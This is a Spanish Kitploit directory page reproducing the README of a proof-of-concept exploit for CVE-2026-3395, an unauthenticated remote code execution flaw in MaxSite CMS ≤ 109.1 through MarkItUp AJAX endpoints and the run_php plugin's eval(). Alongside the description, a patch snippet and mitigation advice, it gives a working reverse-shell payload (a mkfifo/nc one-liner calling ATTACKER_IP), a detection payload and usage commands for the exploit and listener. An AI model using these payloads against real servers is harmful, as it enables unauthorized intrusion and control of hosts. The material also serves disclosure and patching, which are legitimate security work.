Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-3395-MaxSite-CMS-Unauthenticated-RCE — Prueba de concepto de exploit para ejecución remota de código no autenticada en MaxSite CMS <= 109.1 a través de los endpoints AJAX del editor MarkItUp, con payloads de detección y shell inversa. | Kitploit
Herramientas/GitHubGitHub/mbanyamer/cve-2026-3395-maxsite-cms-unauthenticated-rce
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónRed Teaming
GitHubmbanyamer/cve-2026-3395-maxsite-cms-unauthenticated-rce

CVE-2026-3395-MaxSite-CMS-Unauthenticated-RCE

Prueba de concepto de exploit para ejecución remota de código no autenticada en MaxSite CMS <= 109.1 a través de los endpoints AJAX del editor MarkItUp, con payloads de detección y shell inversa.

Ver Repositorio
5hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE‑2026‑3395 — Ejecución Remota de Código No Autenticada en MaxSite CMS

Author Country Instagram GitHub CVE Exploit Type CVSS

Resumen

Vulnerabilidad de Ejecución Remota de Código (RCE) no autenticada en MaxSite CMS ≤ 109.1.

La falla surge de controles de autorización débiles en los endpoints AJAX del plugin del editor MarkItUp, combinados con la ejecución insegura de código PHP proporcionado por el usuario mediante el plugin run_php.

  • Descubierta / Corregida: Marzo de 2026
  • Parcheada en: MaxSite CMS 109.2
  • Proveedor: MaxSite CMS
  • Repositorio: maxsite/cms

Descripción

La vulnerabilidad afecta a los siguientes archivos del plugin del editor MarkItUp:

  • preview-ajax.php
  • autosave-post-ajax.php

Estos endpoints:

  • Son accesibles sin autenticación
  • Realizan solo una validación débil del referrer (fácilmente evadible)
  • Pasan la entrada del usuario al plugin run_php
  • Ejecutan shortcodes [php]...[/php] usando eval()

Un atacante puede enviar una solicitud POST manipulada a la ruta /ajax/ que contenga una ruta interna codificada en Base64 y un payload PHP malicioso a través del parámetro data, lo que resulta en:

🚨 Ejecución Remota de Código Totalmente No Autenticada


Diagrama del Flujo del Ataque

root@kitploit:~
graph TD
    A["Attacker"] -->|"Malicious POST Request"| B["AJAX Endpoint"]
    B -->|"Referer Spoofing"| C["preview-ajax.php"]
    C -->|"Unsanitized Input"| D["run_php Plugin"]
    D -->|"eval() Execution"| E["Arbitrary PHP Execution"]
    E -->|"Command Execution"| F["Compromised Server"]

Requisitos Previos

  • Versión de MaxSite CMS ≤ 109.1
  • Plugin run_php habilitado (común por defecto)
  • Configuración de PHP que permita eval()

Explotación

Se incluye un exploit de prueba de concepto en Python 3 (exploit.py).

Payload de Detección (No Destructivo)

root@kitploit:~
[php]echo 'RCE CONFIRMED - ' . phpversion();[/php]

Payload de Reverse Shell

root@kitploit:~
[php]system('rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP ATTACKER_PORT >/tmp/f');[/php]

Uso

1. Iniciar el Listener

root@kitploit:~
nc -lvnp 9001

2. Ejecutar el Exploit

root@kitploit:~
python3 exploit.py http://target.com --lhost 10.10.14.22 --lport 9001

Mitigación

Acciones Inmediatas

  • Actualizar a MaxSite CMS 109.2 o posterior
  • Deshabilitar el plugin run_php si no es necesario

Parche Manual

Agregar comprobaciones de autenticación a los archivos vulnerables:

root@kitploit:~
if (!is_login()) {
    die('Access denied');
}
mso_checkreferer();

Referencias

  • Commit del Parche https://github.com/maxsite/cms/commit/08937a3c5d672a242d68f53e9fccf8a748820ef3

  • Entrada de la Vulnerabilidad https://vuldb.com/?id.348281

  • Registro NVD https://nvd.nist.gov/vuln/detail/CVE-2026-3395


Aviso Legal

Este proyecto se proporciona para:

  • Investigación de seguridad
  • Fines educativos
  • Pruebas de penetración autorizadas

⚠️ No utilizar contra sistemas sin permiso explícito.

El autor no asume ninguna responsabilidad por el mal uso o los daños.


Autor

Mohammed Idrees Banyamer Jordania 🇯🇴 Investigador de Seguridad

banyamer_security — Silent Hunter • Shadow Presence

Marzo de 2026

Descargar herramienta